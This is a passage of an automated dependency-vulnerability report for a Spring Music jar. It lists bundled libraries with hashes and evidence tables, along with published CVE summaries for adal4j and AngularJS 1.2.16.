| Vendor | pom | developer name | Gil Tene | Medium |
| Vendor | pom | groupid | org.latencyutils | Highest |
| Vendor | pom | name | LatencyUtils | High |
| Vendor | pom | url | http://latencyutils.github.io/LatencyUtils/ | Highest |
| Product | file | name | LatencyUtils | High |
| Product | jar | package name | latencyutils | Highest |
| Product | pom | artifactid | LatencyUtils | Highest |
| Product | pom | developer id | giltene | Low |
| Product | pom | developer name | Gil Tene | Low |
| Product | pom | groupid | org.latencyutils | Highest |
| Product | pom | name | LatencyUtils | High |
| Product | pom | url | http://latencyutils.github.io/LatencyUtils/ | Medium |
| Version | file | version | 2.0.3 | High |
| Version | pom | version | 2.0.3 | Highest |
spring-music-sqldb-1.0.jar: activation-1.1.jar
Description:
JavaBeans Activation Framework (JAF) is a standard extension to the Java platform that lets you take advantage of standard services to: determine the type of an arbitrary piece of data; encapsulate access to it; discover the operations available on it; and instantiate the appropriate bean to perform the operation(s).
License:
Common Development and Distribution License (CDDL) v1.0: https://glassfish.dev.java.net/public/CDDLv1.0.html
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/activation-1.1.jar
MD5: 8ae38e87cd4f86059c0294a8fe3e0b18
SHA1: e6cb541461c2834bdea3eb920f1884d1eb508b50
SHA256: 2881c79c9d6ef01c58e62beea13e9d1ac8b8baa16f2fc198ad6e6776defdcdd3
| Evidence Type | Source | Name | Value | Confidence |
|---|---|---|---|---|
| Vendor | central | artifactid | activation | Highest |
| Vendor | central | groupid | javax.activation | Highest |
| Vendor | file | name | activation | High |
| Vendor | jar | package name | activation | Highest |
| Vendor | jar | package name | activation | Low |
| Vendor | jar | package name | javax | Highest |
| Vendor | jar | package name | javax | Low |
| Vendor | jar | package name | sun | Highest |
| Vendor | jar (hint) | package name | oracle | Highest |
| Vendor | Manifest | extension-name | javax.activation | Medium |
| Vendor | Manifest | Implementation-Vendor | Sun Microsystems, Inc. | High |
| Vendor | Manifest | Implementation-Vendor-Id | com.sun | Medium |
| Vendor | Manifest | specification-vendor | Sun Microsystems, Inc. | Low |
| Vendor | pom | artifactid | activation | Low |
| Vendor | pom | groupid | javax.activation | Highest |
| Vendor | pom | name | JavaBeans Activation Framework (JAF) | High |
| Vendor | pom | url | http://java.sun.com/products/javabeans/jaf/index.jsp | Highest |
| Product | central | artifactid | activation | Highest |
| Product | file | name | activation | High |
| Product | jar | package name | activation | Highest |
| Product | jar | package name | activation | Low |
| Product | jar | package name | javax | Highest |
| Product | Manifest | extension-name | javax.activation | Medium |
| Product | Manifest | specification-title | JavaBeans(TM) Activation Framework Specification | Medium |
| Product | pom | artifactid | activation | Highest |
| Product | pom | groupid | javax.activation | Highest |
| Product | pom | name | JavaBeans Activation Framework (JAF) | High |
| Product | pom | url | http://java.sun.com/products/javabeans/jaf/index.jsp | Medium |
| Version | central | version | 1.1 | Highest |
| Version | file | version | 1.1 | High |
| Version | Manifest | Implementation-Version | 1.1 | High |
| Version | pom | version | 1.1 | Highest |
spring-music-sqldb-1.0.jar: adal4j-1.6.0.jar
Description:
Azure active directory library for Java gives you the ability to add Windows Azure Active Directory authentication to your web application with just a few lines of additional code. Using our ADAL SDKs you can quickly and easily extend your existing application to all the employees that use Windows Azure AD and Active Directory on-premises using Active Directory Federation Services, including Office365 customers.
License:
MIT License
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/adal4j-1.6.0.jar
MD5: ea5ee234502edd75d6b60704eff6028d
SHA1: 5075875d651ed11b59f4053cd033ceb8bbc1a8e3
SHA256: f3f8195752c98cac306617363ccf0ef19a0475af3960ee1847b929e77fb63eac
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | adal4j | High
Vendor | jar | package name | adal4j | Highest
Vendor | jar | package name | microsoft | Highest
Vendor | Manifest | Implementation-Vendor-Id | com.microsoft.azure | Medium
Vendor | pom | artifactid | adal4j | Low
Vendor | pom | developer id | msopentech | Medium
Vendor | pom | developer name | Microsoft Open Technologies, Inc. | Medium
Vendor | pom | groupid | com.microsoft.azure | Highest
Vendor | pom | name | adal4j | High
Vendor | pom | url | AzureAD/azure-activedirectory-library-for-java | Highest
Product | file | name | adal4j | High
Product | jar | package name | adal4j | Highest
Product | jar | package name | microsoft | Highest
Product | Manifest | Implementation-Title | adal4j | High
Product | Manifest | specification-title | adal4j | Medium
Product | pom | artifactid | adal4j | Highest
Product | pom | developer id | msopentech | Low
Product | pom | developer name | Microsoft Open Technologies, Inc. | Low
Product | pom | groupid | com.microsoft.azure | Highest
Product | pom | name | adal4j | High
Product | pom | url | AzureAD/azure-activedirectory-library-for-java | High
Version | file | version | 1.6.0 | High
Version | Manifest | Implementation-Version | 1.6.0 | High
Version | pom | version | 1.6.0 | Highest
CVE-2021-42306
An information disclosure vulnerability manifests when a user or an application uploads unprotected private key data as part of an authentication certificate keyCredential on an Azure AD Application or Service Principal (which is not recommended). This vulnerability allows a user or service in the tenant with application read access to read the private key data that was added to the application.
Azure AD addressed this vulnerability by preventing disclosure of any private key values added to the application.
Microsoft has identified services that could manifest this vulnerability, and steps that customers should take to be protected. Refer to the FAQ section for more information.
For more details on this issue, please refer to the MSRC Blog Entry.
CWE-522 Insufficiently Protected Credentials
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N/E:2.8/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: adapter-rxjava-2.1.0.jar
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/adapter-rxjava-2.1.0.jar
MD5: 2c148d6edaddd4dc63e00947550e1bd5
SHA1: 693eddc23e87ab13f9cf5001707ce8e7e1d1ff01
SHA256: 30d08849b7382549243e8a7b65c7cbcd8b1f30c97e03153d0211f87efd7be4c1
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | adapter-rxjava | High
Vendor | jar | package name | adapter | Highest
Vendor | jar | package name | adapter | Low
Vendor | jar | package name | retrofit2 | Highest
Vendor | jar | package name | retrofit2 | Low
Vendor | jar | package name | rxjava | Highest
Vendor | jar | package name | rxjava | Low
Vendor | pom | artifactid | adapter-rxjava | Low
Vendor | pom | groupid | com.squareup.retrofit2 | Highest
Vendor | pom | name | Adapter: RxJava | High
Vendor | pom | parent-artifactid | retrofit-adapters | Low
Product | file | name | adapter-rxjava | High
Product | jar | package name | adapter | Highest
Product | jar | package name | adapter | Low
Product | jar | package name | retrofit2 | Highest
Product | jar | package name | rxjava | Highest
Product | jar | package name | rxjava | Low
Product | pom | artifactid | adapter-rxjava | Highest
Product | pom | groupid | com.squareup.retrofit2 | Highest
Product | pom | name | Adapter: RxJava | High
Product | pom | parent-artifactid | retrofit-adapters | Medium
Version | file | version | 2.1.0 | High
Version | pom | version | 2.1.0 | Highest
spring-music-sqldb-1.0.jar: angular-ui-0.4.0-2.jar
Description:
WebJar for AngularUI
License:
MIT License: https://github.com/angular-ui/angular-ui/blob/master/LICENSE
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angular-ui-0.4.0-2.jar
MD5: 040d7d520f8bec40e6cb91514bc1212e
SHA1: 8deff747c57910574bfa757abce9e1873dc015ce
SHA256: 61698ce01faa019cbe1a4aacd68163f70d4d16d0f4f4d1dd54e7d19fb928f886
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | angular-ui | High
Vendor | pom | artifactid | angular-ui | Low
Vendor | pom | developer email | james@jamesward.org | Low
Vendor | pom | developer email | mabuzer@alz-inc.com | Low
Vendor | pom | developer id | jamesward | Medium
Vendor | pom | developer id | mabuzer | Medium
Vendor | pom | developer name | James Ward | Medium
Vendor | pom | developer name | Mohammad M. AbuZer | Medium
Vendor | pom | groupid | org.webjars | Highest
Vendor | pom | name | AngularUI | High
Vendor | pom | url | http://webjars.org | Highest
Product | file | name | angular-ui | High
Product | pom | artifactid | angular-ui | Highest
Product | pom | developer email | james@jamesward.org | Low
Product | pom | developer email | mabuzer@alz-inc.com | Low
Product | pom | developer id | jamesward | Low
Product | pom | developer id | mabuzer | Low
Product | pom | developer name | James Ward | Low
Product | pom | developer name | Mohammad M. AbuZer | Low
Product | pom | groupid | org.webjars | Highest
Product | pom | name | AngularUI | High
Product | pom | url | http://webjars.org | Medium
Version | pom | version | 0.4.0-2 | Highest
spring-music-sqldb-1.0.jar: angular-ui-0.4.0-2.jar: angular-ui-ieshiv.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angular-ui-0.4.0-2.jar/META-INF/resources/webjars/angular-ui/0.4.0/angular-ui-ieshiv.js
MD5: db2961939a0a8ea4fa8cd627fa8ebd42
SHA1: d3f1375472c9d88157cdee8a410ebaf092429d53
SHA256: 269c614f28c2a9470a6f1c3642a1734986a949f9272a0ce52e1c9d7eb888028f
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angular-ui-0.4.0-2.jar: angular-ui-ieshiv.min.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angular-ui-0.4.0-2.jar/META-INF/resources/webjars/angular-ui/0.4.0/angular-ui-ieshiv.min.js
MD5: f77a7f92be3f43f1770740a1bc4a36d1
SHA1: 1d2a9dbbb947fa7d245beb6fe0e45269d099fcb4
SHA256: 66a6f6df130eaef6d1c61bddbcfb21e863c070d1fb87f5cb6fe11a58f17242d3
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angular-ui-0.4.0-2.jar: angular-ui.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angular-ui-0.4.0-2.jar/META-INF/resources/webjars/angular-ui/0.4.0/angular-ui.js
MD5: 78d98a029a2b7721c92c1d8fd61238d5
SHA1: 6de051ea1e3fc9891b1da1c57bb7c06ff3203c6e
SHA256: f9d01b24e8e56ae4378443ebc65513c322aeb5af28f5cb6364ec02e077f7fcaa
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angular-ui-0.4.0-2.jar: angular-ui.min.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angular-ui-0.4.0-2.jar/META-INF/resources/webjars/angular-ui/0.4.0/angular-ui.min.js
MD5: b33f486ae57ed694809e6eaad880be82
SHA1: 0a5a807ead812ec3bd0b9ce8512aefc61fc7a877
SHA256: a410f8bf4a06b2ffd097fd7630c761dee535c9fdbe4e0f0de309b33525f7adb3
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angular-ui-0.4.0-2.jar: webjars-requirejs.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angular-ui-0.4.0-2.jar/META-INF/resources/webjars/angular-ui/0.4.0/webjars-requirejs.js
MD5: edb68afe6f8ceec99a4fb9f33632b6e4
SHA1: b3732c46dd14c6c09e68fe83029872838639343b
SHA256: 51e31f0b6e46545f6b293ed4cc1688adae02386e2c5dde9530f238ccedfa4b8b
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angular-ui-bootstrap-0.10.0-1.jar
Description:
WebJar for Angular UI Bootstrap
License:
MIT License: https://github.com/angular-ui/bootstrap/blob/master/LICENSE
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angular-ui-bootstrap-0.10.0-1.jar
MD5: 85ab8f59807a4097e7706c7305d3fd4c
SHA1: 36425a16aca739ff1123661fa763333142bdf311
SHA256: a1a10220615d75ff46f0315e3e575f1dff8738102ac7e2676e225beb73bb3fb2
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | angular-ui-bootstrap | High
Vendor | pom | artifactid | angular-ui-bootstrap | Low
Vendor | pom | developer email | small.guo@enovation.com.cn | Low
Vendor | pom | developer id | smallg | Medium
Vendor | pom | developer name | Small Guo | Medium
Vendor | pom | groupid | org.webjars | Highest
Vendor | pom | name | Angular Ui Bootstrap | High
Vendor | pom | url | http://webjars.org | Highest
Product | file | name | angular-ui-bootstrap | High
Product | pom | artifactid | angular-ui-bootstrap | Highest
Product | pom | developer email | small.guo@enovation.com.cn | Low
Product | pom | developer id | smallg | Low
Product | pom | developer name | Small Guo | Low
Product | pom | groupid | org.webjars | Highest
Product | pom | name | Angular Ui Bootstrap | High
Product | pom | url | http://webjars.org | Medium
Version | pom | version | 0.10.0-1 | Highest
spring-music-sqldb-1.0.jar: angular-ui-bootstrap-0.10.0-1.jar: ui-bootstrap-tpls.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angular-ui-bootstrap-0.10.0-1.jar/META-INF/resources/webjars/angular-ui-bootstrap/0.10.0/ui-bootstrap-tpls.js
MD5: 5274f0a1f411f1e8a7f7eae0620361fd
SHA1: e21e017665abea9cc2f06f06286fc5b28e2fc117
SHA256: 769d5f32ce5fcbb7883b88bb39d748a6e994893ebb024627d76410fc9bcdc7aa
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angular-ui-bootstrap-0.10.0-1.jar: ui-bootstrap-tpls.min.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angular-ui-bootstrap-0.10.0-1.jar/META-INF/resources/webjars/angular-ui-bootstrap/0.10.0/ui-bootstrap-tpls.min.js
MD5: 148a1e75b8734cd4b72269e2c9aec02d
SHA1: 91d6e5c34f69c59f3c6627a212c5504ab4131343
SHA256: 9ac24f79e71caa6403f3417d207e60368f3e01dae2765c6172c8fceea2f3721b
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angular-ui-bootstrap-0.10.0-1.jar: ui-bootstrap.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angular-ui-bootstrap-0.10.0-1.jar/META-INF/resources/webjars/angular-ui-bootstrap/0.10.0/ui-bootstrap.js
MD5: 9b97833cf878ec391e87ead3669b50fc
SHA1: 63fd5ee6b3d4daf60613139f2ae0a442d8fd80e2
SHA256: 900b2db42ca78a4238c14dfdcf7fb801f57387d25495fa4735f6c82255c48d0b
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angular-ui-bootstrap-0.10.0-1.jar: ui-bootstrap.min.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angular-ui-bootstrap-0.10.0-1.jar/META-INF/resources/webjars/angular-ui-bootstrap/0.10.0/ui-bootstrap.min.js
MD5: 257ab601ed6a20539186c31ac61aea12
SHA1: c39771e87b36d9abbf56aae2c76404090550330d
SHA256: 7ea610a66460266f2e709ec9360f69317dae6865c0d6e5c4275e49a15966c497
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angular-ui-bootstrap-0.10.0-1.jar: webjars-requirejs.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angular-ui-bootstrap-0.10.0-1.jar/META-INF/resources/webjars/angular-ui-bootstrap/0.10.0/webjars-requirejs.js
MD5: 5dade7519d4cb0442bc701e1c1884a09
SHA1: ce306175f45b2c6ab4a1d49f82e41f2d1e8c17c0
SHA256: f1eb6d709cfb26e227d72e601eed63f6d455080eee0790ee6f6b1a18c0436d97
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar
Description:
WebJar for AngularJS
License:
MIT License: https://github.com/angular/angular.js/blob/master/LICENSE
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar
MD5: a5ee8f1a710c9ace3ca3f85b25307c4f
SHA1: 2a2d9eb9506e014fca469f2669697474c777a8c2
SHA256: 5bb4f6167d282e263d4719a87c33e508a6b089610192224b96548fbff847d196
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | angularjs | High
Vendor | pom | artifactid | angularjs | Low
Vendor | pom | developer email | james@jamesward.org | Low
Vendor | pom | developer id | jamesward | Medium
Vendor | pom | developer name | James Ward | Medium
Vendor | pom | groupid | org.webjars | Highest
Vendor | pom | name | AngularJS | High
Vendor | pom | url | http://webjars.org | Highest
Product | file | name | angularjs | High
Product | pom | artifactid | angularjs | Highest
Product | pom | developer email | james@jamesward.org | Low
Product | pom | developer id | jamesward | Low
Product | pom | developer name | James Ward | Low
Product | pom | groupid | org.webjars | Highest
Product | pom | name | AngularJS | High
Product | pom | url | http://webjars.org | Medium
Version | file | version | 1.2.16 | High
Version | pom | version | 1.2.16 | Highest
CVE-2019-10768
In AngularJS before 1.7.9 the function `merge()` could be tricked into adding or modifying properties of `Object.prototype` using a `__proto__` payload.
CWE-1321 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N
References:
Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular.js:*:*:*:*:*:*:*:* versions up to (excluding) 1.7.9
CVE-2022-25869
All versions of package angular are vulnerable to Cross-site Scripting (XSS) due to insecure page caching in the Internet Explorer browser, which allows interpolation of <textarea> elements.
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3: Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A
References:
Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular:*:*:*:*:*:node.js:*:*
CVE-2019-14863 (OSSINDEX)
angular - mutation Cross-Site Scripting (mXSS) [CVE-2019-14863]
The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3: Base Score: MEDIUM (5.4) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.webjars:angularjs:1.2.16:*:*:*:*:*:*:*
CVE-2020-7676
angular.js prior to 1.8.0 allows cross site scripting. The regex-based input HTML replacement may turn sanitized code into unsanitized one. Wrapping "<option>" elements in "<select>" ones changes parsing behavior, leading to possibly unsanitizing code.
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3: Base Score: MEDIUM (5.4) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:2.3/RC:R/MAV:A
CVSSv2: Base Score: LOW (3.5) Vector: /AV:N/AC:M/Au:S/C:N/I:P/A:N
References:
Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular.js:*:*:*:*:*:*:*:* versions up to (excluding) 1.8.0
CVE-2023-26116
Versions of the package angular from 1.2.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the angular.copy() utility function due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.
CWE-1333 Inefficient Regular Expression Complexity
CVSSv3: Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:3.9/RC:R/MAV:A
References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY
info - https://github.com/advisories/GHSA-2vrf-hf26-jrp5
report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY
report@snyk.io - MAILING_LIST,THIRD_PARTY_ADVISORY
Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular:*:*:*:*:*:node.js:*:* versions from (including) 1.2.21; versions up to (including) 1.8.3
CVE-2023-26117
Versions of the package angular from 1.0.0 are vulnerable to Regular Expression Denial of Service (ReDoS) via the $resource service due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.
CWE-1333 Inefficient Regular Expression Complexity
CVSSv3: Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:3.9/RC:R/MAV:A
References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY
info - https://github.com/advisories/GHSA-2qqx-w9hr-q5gx
report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY
report@snyk.io - MAILING_LIST,THIRD_PARTY_ADVISORY
Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular:*:*:*:*:*:node.js:*:* versions from (including) 1.0.0; versions up to (including) 1.8.3
CVE-2023-26118
Versions of the package angular from 1.4.9 are vulnerable to Regular Expression Denial of Service (ReDoS) via the <input type="url"> element due to the usage of an insecure regular expression in the input[url] functionality. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.
CWE-1333 Inefficient Regular Expression Complexity
CVSSv3: Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:3.9/RC:R/MAV:A
References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY
info - https://github.com/advisories/GHSA-qwqh-hm9m-p5hr
report@snyk.io - EXPLOIT
report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY
report@snyk.io - MAILING_LIST,THIRD_PARTY_ADVISORY
Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular:*:*:*:*:*:node.js:*:* versions from (including) 1.4.9; versions up to (including) 1.8.3
CVE-2024-8373
Improper sanitization of the value of the [srcset] attribute in <source> HTML elements in AngularJS allows attackers to bypass common image source restrictions, which can also lead to a form of Content Spoofing (https://owasp.org/www-community/attacks/Content_Spoofing).
This issue affects all versions of AngularJS.
Note:
The AngularJS project is End-of-Life and will not receive any updates to address this issue. For more information see https://docs.angularjs.org/misc/version-support-status.
CWE-791 Incomplete Filtering of Special Elements, NVD-CWE-Other
CVSSv3: Base Score: MEDIUM (4.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:2.8/RC:R/MAV:A
References:
Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular.js:*:*:*:*:*:*:*:* versions up to (including) 1.8.3
cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:linux:*:*
cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vsphere:*:*
cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:*
Cross-Site Scripting via JSONP (RETIREJS)
Unscored:
References:
DOS in $sanitize (RETIREJS)
Unscored:
References:
The attribute usemap can be used as a security exploit (RETIREJS)
Unscored:
References:
Universal CSP bypass via add-on in Firefox (RETIREJS)
Unscored:
References:
XSS via JQLite DOM manipulation functions in AngularJS (RETIREJS)
Unscored:
References:
CVE-2025-0716 (RETIREJS)
Unscored:
References:
End-of-Life: Long term support for AngularJS has been discontinued as of December 31, 2021 (RETIREJS)
Unscored:
References:
XSS in $sanitize in Safari/Firefox (RETIREJS)
Unscored:
References:
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_af-na.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_af-na.js
MD5: 52b062dd8460f895f78ae2922afe5370
SHA1: 622a9a950180ca89bf8f82bd07fe996423fe4ebc
SHA256: 1831a93e826ce84debe66b59ec226ac6e391fe32fe8840903a65bec37acdc269
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_af-za.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_af-za.js
MD5: cf53af59608ac752371295d59b95d08f
SHA1: 8bfad7c9c006907bef603878e97342b34d830a82
SHA256: be3389407f81b5acca6fed92bd760f76dea55c24a1b3ec458c1bb4c5a692907f
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_af.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_af.js
MD5: 33952d0b922128a216b50dcc714135de
SHA1: 8b3817b599f1a62f1e20bd283e48944b6eb34b06
SHA256: e9b66ef1fa1d2ee2ba2d1cb997158f666f4d43bb5e6593f9e7d71ed896d7030d
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_am-et.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_am-et.js
MD5: 94736b059106c512be99a2196eec426f
SHA1: df7e37b8227a028e7de18bd5495586cb74f3932f
SHA256: d5781adba452ed3ea8b0e5f9907c4b7dd18aeb4958b8b318aa0fd9a035976ce3
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_am.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_am.js
MD5: 426072230e164a917397ea64a64e84ef
SHA1: a57f29cf3958ece77643e058dd5a8d78946ef7b3
SHA256: 84f6ed6d738430f6a8023cac92979504ff5842081118a54df144f352545c3773
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar-001.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ar-001.js
MD5: 2503eb8d5dc0dda7935562da1b8c3b05
SHA1: c040b61fafc48f22d225254752851c9cf710ba51
SHA256: 7dc884b5378938a55546d4c2e522e5be0c33e6a06c10297d78fb8f974a327aa1
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar-ae.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ar-ae.js
MD5: d3f4c9a3e30d6bf510c4102c75a8e5e6
SHA1: b60262eb0996094e657f57b0792f7ff8444d9a58
SHA256: 0b59d0fbacabbbc4f82d2371af52ff68ad24f05a6953aaeb733fd51081d022ad
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar-bh.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ar-bh.js
MD5: 13b2e13d7c0cd1444f9638c1898cdffe
SHA1: e0eb25e81a1358dbc67b2c21abb2072a06ab39ff
SHA256: c773e4e8ab72cc9b46840e3f9261f66c033bf49be4ffecf6fd8af5cb44b6aed5
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar-dz.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ar-dz.js
MD5: d8cf5006ec70a6239d59b9f08ebd4453
SHA1: da114d7b8ae9a899520aa0285970641e1058b97f
SHA256: 3f8c6a901f0dd155da1171ba1ca305af4c7c8a0de2d5afade2f3d264f9ecedb1
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar-eg.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ar-eg.js
MD5: b47b19ba698a4ec838a477682500ee33
SHA1: d090901c55a8c12857bc9bb5515418994e1de15d
SHA256: 3cd88d750d9bcba755c91ed0d41522cb0ea8cbca56bec4d5bfd0dc2c176a02ca
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar-iq.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ar-iq.js
MD5: e143918a9751017d8a8398b612f28708
SHA1: b469414b5493254a9dbd32493e50ae197258a17b
SHA256: 41c5ab7033f462a9eee3bebd380f140a47d51b25b2690a282d9fe70d0c0480f8
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar-jo.js
